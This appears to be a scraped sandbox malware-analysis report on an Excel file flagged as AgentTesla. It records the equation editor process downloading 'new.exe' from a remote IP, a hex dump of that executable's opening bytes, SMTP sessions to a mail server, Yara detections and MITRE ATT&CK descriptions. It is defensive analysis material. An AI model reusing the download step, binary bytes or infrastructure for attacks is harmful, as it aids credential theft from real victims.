Jan 13, 2021 20:43:59.808614016 CET	8.8.8.8	192.168.2.22	0x8c6f	No error (0)	gammavilla.org		217.174.152.38	A (IP address)	IN (0x0001)
Jan 13, 2021 20:44:10.835068941 CET	8.8.8.8	192.168.2.22	0x9e7e	No error (0)	mail.gammavilla.org	gammavilla.org		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 20:44:10.835068941 CET	8.8.8.8	192.168.2.22	0x9e7e	No error (0)	gammavilla.org		217.174.152.38	A (IP address)	IN (0x0001)
Jan 13, 2021 20:44:10.892323017 CET	8.8.8.8	192.168.2.22	0x9e7e	No error (0)	mail.gammavilla.org	gammavilla.org		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 20:44:10.892323017 CET	8.8.8.8	192.168.2.22	0x9e7e	No error (0)	gammavilla.org		217.174.152.38	A (IP address)	IN (0x0001)
Jan 13, 2021 20:44:10.949981928 CET	8.8.8.8	192.168.2.22	0x9e7e	No error (0)	mail.gammavilla.org	gammavilla.org		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 20:44:10.949981928 CET	8.8.8.8	192.168.2.22	0x9e7e	No error (0)	gammavilla.org		217.174.152.38	A (IP address)	IN (0x0001)
Jan 13, 2021 20:44:11.009556055 CET	8.8.8.8	192.168.2.22	0x9e7e	No error (0)	mail.gammavilla.org	gammavilla.org		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 20:44:11.009556055 CET	8.8.8.8	192.168.2.22	0x9e7e	No error (0)	gammavilla.org		217.174.152.38	A (IP address)	IN (0x0001)
Jan 13, 2021 20:44:11.112289906 CET	8.8.8.8	192.168.2.22	0x7350	No error (0)	mail.gammavilla.org	gammavilla.org		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 20:44:11.112289906 CET	8.8.8.8	192.168.2.22	0x7350	No error (0)	gammavilla.org		217.174.152.38	A (IP address)	IN (0x0001)
Jan 13, 2021 20:44:22.087548018 CET	8.8.8.8	192.168.2.22	0x1780	No error (0)	mail.gammavilla.org	gammavilla.org		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 20:44:22.087548018 CET	8.8.8.8	192.168.2.22	0x1780	No error (0)	gammavilla.org		217.174.152.38	A (IP address)	IN (0x0001)
Jan 13, 2021 20:44:22.174501896 CET	8.8.8.8	192.168.2.22	0xf21b	No error (0)	mail.gammavilla.org	gammavilla.org		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 20:44:22.174501896 CET	8.8.8.8	192.168.2.22	0xf21b	No error (0)	gammavilla.org		217.174.152.38	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

191.96.149.225

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49167	191.96.149.225	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 20:42:44.916251898 CET	0	OUT	GET /new.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 191.96.149.225 Connection: Keep-Alive
Jan 13, 2021 20:42:45.084038019 CET	1	IN	HTTP/1.1 200 OK Date: Wed, 13 Jan 2021 19:42:45 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.0 Last-Modified: Wed, 13 Jan 2021 16:41:58 GMT ETag: "c6400-5b8cad158905f" Accept-Ranges: bytes Content-Length: 812032 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 bf 99 b4 e7 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 5a 0c 00 00 08 00 00 00 00 00 00 8e 79 0c 00 00 20 00 00 00 80 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 0c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c 79 0c 00 4f 00 00 00 00 80 0c 00 d4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 0c 00 0c 00 00 00 20 79 0c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 59 0c 00 00 20 00 00 00 5a 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d4 05 00 00 00 80 0c 00 00 06 00 00 00 5c 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 0c 00 00 02 00 00 00 62 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 79 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 e4 ca 00 00 5c 80 00 00 03 00 00 00 4b 00 00 06 40 4b 01 00 e0 2d 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 05 00 42 00 00 00 01 00 00 11 00 73 15 00 00 0a 0a 06 16 16 02 28 16 00 00 0a 0b 12 01 28 17 00 00 0a 02 28 16 00 00 0a 0b 12 01 28 18 00 00 0a 6f 19 00 00 0a 00 02 06 73 1a 00 00 0a 28 1b 00 00 0a 00 02 03 28 1c 00 00 0a 00 2a 22 02 28 1d 00 00 0a 00 2a 00 1b 30 05 00 07 01 00 00 02 00 00 11 00 16 0a 00 72 01 00 00 70 0b 07 28 1e 00 00 0a 0d 09 39 e0 00 00 00 00 07 19 17 19 73 1f 00 00 0a 13 04 11 04 73 20 00 00 0a 13 05 00 38 9f 00 00 00 00 08 17 8d 61 00 00 01 25 16 1f 3d 9d 6f 21 00 00 0a 13 06 11 06 16 9a 6f 22 00 00 0a 72 69 00 00 70 28 23 00 00 0a 13 07 11 07 2c 71 00 11 06 17 9a 6f 22 00 00 0a 02 28 23 00 00 0a 13 08 11 08 2c 5a 00 2b 3a 00 08 17 8d 61 00 00 01 25 16 1f 3d 9d 6f 21 00 00 0a 13 09 11 09 16 9a 6f 22 00 00 0a 72 7b 00 00 70 28 23 00 00 0a 13 0a 11 0a 2c 0c 11 09 17 9a 12 00 28 24 00 00 0a 26 00 11 05 6f 25 00 00 0a 25 0c 72 87 00 00 70 6f 26 00 00 0a 16 fe 01 13 0b 11 0b 2d aa 00 00 00 11 05 6f 25 00 00 0a 25 0c 14 fe 03 13 0c 11 0c 3a 4c ff ff ff 00 de 05 26 00 00 de 00 11 05 6f 27 00 00 0a 00 00 00 de 05 26 00 00 de 00 06 13 0d 2b 00 11 0d 2a 00 01 1c 00 00 00 00 2c 00 bd e9 00 05 14 00 00 01 00 00 03 00 f7 fa 00 05 14 00 00 01 1b 30 05 00 a3 01 00 00 03 00 00 11 00 73 28 00 00 0a 0a 72 8b 00 00 70 0b Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL0Zy @ @<yO y H.textY Z `.rsrc\@@.relocb@BpyH\K@K-0Bs((((os(("(0rp(9ss 8a%=o!o"rip(#,qo"(#,Z+:a%=o!o"r{p(#,($&o%%rpo&-o%%:L&o'&+*,0s(rp

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Jan 13, 2021 20:43:34.836627007 CET	587	49168	217.174.152.38	192.168.2.22	220-honey.vivawebhost.com ESMTP Exim 4.93 #2 Wed, 13 Jan 2021 21:43:34 +0200 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jan 13, 2021 20:43:34.837357044 CET	49168	587	192.168.2.22	217.174.152.38	EHLO 899552
Jan 13, 2021 20:43:34.916750908 CET	587	49168	217.174.152.38	192.168.2.22	250-honey.vivawebhost.com Hello 899552 [84.17.52.74] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-STARTTLS 250 HELP
Jan 13, 2021 20:43:34.917283058 CET	49168	587	192.168.2.22	217.174.152.38	STARTTLS
Jan 13, 2021 20:43:34.998734951 CET	587	49168	217.174.152.38	192.168.2.22	220 TLS go ahead
Jan 13, 2021 20:43:36.509646893 CET	587	49168	217.174.152.38	192.168.2.22	421 honey.vivawebhost.com lost input connection
Jan 13, 2021 20:43:47.893498898 CET	587	49171	217.174.152.38	192.168.2.22	220-honey.vivawebhost.com ESMTP Exim 4.93 #2 Wed, 13 Jan 2021 21:43:47 +0200 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jan 13, 2021 20:43:47.893995047 CET	49171	587	192.168.2.22	217.174.152.38	EHLO 899552
Jan 13, 2021 20:43:47.975651026 CET	587	49171	217.174.152.38	192.168.2.22	250-honey.vivawebhost.com Hello 899552 [84.17.52.74] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-STARTTLS 250 HELP
Jan 13, 2021 20:43:47.976128101 CET	49171	587	192.168.2.22	217.174.152.38	STARTTLS
Jan 13, 2021 20:43:48.060558081 CET	587	49171	217.174.152.38	192.168.2.22	220 TLS go ahead
Jan 13, 2021 20:44:00.074893951 CET	587	49172	217.174.152.38	192.168.2.22	220-honey.vivawebhost.com ESMTP Exim 4.93 #2 Wed, 13 Jan 2021 21:44:00 +0200 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jan 13, 2021 20:44:00.075277090 CET	49172	587	192.168.2.22	217.174.152.38	EHLO 899552
Jan 13, 2021 20:44:00.156693935 CET	587	49172	217.174.152.38	192.168.2.22	250-honey.vivawebhost.com Hello 899552 [84.17.52.74] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-STARTTLS 250 HELP
Jan 13, 2021 20:44:00.157043934 CET	49172	587	192.168.2.22	217.174.152.38	STARTTLS
Jan 13, 2021 20:44:00.241065025 CET	587	49172	217.174.152.38	192.168.2.22	220 TLS go ahead
Jan 13, 2021 20:44:11.366298914 CET	587	49173	217.174.152.38	192.168.2.22	220-honey.vivawebhost.com ESMTP Exim 4.93 #2 Wed, 13 Jan 2021 21:44:11 +0200 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jan 13, 2021 20:44:11.366606951 CET	49173	587	192.168.2.22	217.174.152.38	EHLO 899552
Jan 13, 2021 20:44:11.448107958 CET	587	49173	217.174.152.38	192.168.2.22	250-honey.vivawebhost.com Hello 899552 [84.17.52.74] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-STARTTLS 250 HELP
Jan 13, 2021 20:44:11.448534012 CET	49173	587	192.168.2.22	217.174.152.38	STARTTLS
Jan 13, 2021 20:44:11.532612085 CET	587	49173	217.174.152.38	192.168.2.22	220 TLS go ahead
Jan 13, 2021 20:44:22.406984091 CET	587	49174	217.174.152.38	192.168.2.22	220-honey.vivawebhost.com ESMTP Exim 4.93 #2 Wed, 13 Jan 2021 21:44:22 +0200 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jan 13, 2021 20:44:22.407346010 CET	49174	587	192.168.2.22	217.174.152.38	EHLO 899552
Jan 13, 2021 20:44:22.486284971 CET	587	49174	217.174.152.38	192.168.2.22	250-honey.vivawebhost.com Hello 899552 [84.17.52.74] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-STARTTLS 250 HELP
Jan 13, 2021 20:44:22.486655951 CET	49174	587	192.168.2.22	217.174.152.38	STARTTLS
Jan 13, 2021 20:44:22.568134069 CET	587	49174	217.174.152.38	192.168.2.22	220 TLS go ahead

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 1532 Parent PID: 584

General

Start time:	20:41:47
Start date:	13/01/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13fa90000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: EQNEDT32.EXE PID: 2528 Parent PID: 584

General

Start time:	20:42:07
Start date:	13/01/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: vbc.exe PID: 2688 Parent PID: 2528

General

Start time:	20:42:09
Start date:	13/01/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x1310000
File size:	812032 bytes
MD5 hash:	72B76DB11728DD92AA4C3CB45F155B05
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2159672026.00000000037E9000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2159254668.00000000027FE000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Analysis Process: vbc.exe PID: 960 Parent PID: 2688

General

Start time:	20:42:13
Start date:	13/01/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	{path}
Imagebase:	0x1310000
File size:	812032 bytes
MD5 hash:	72B76DB11728DD92AA4C3CB45F155B05
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2368865648.00000000027E1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2368082691.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report 0AX4532QWSA.xlsx

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Agenttesla

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "0AX4532QWSA.xlsx"

Indicators

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre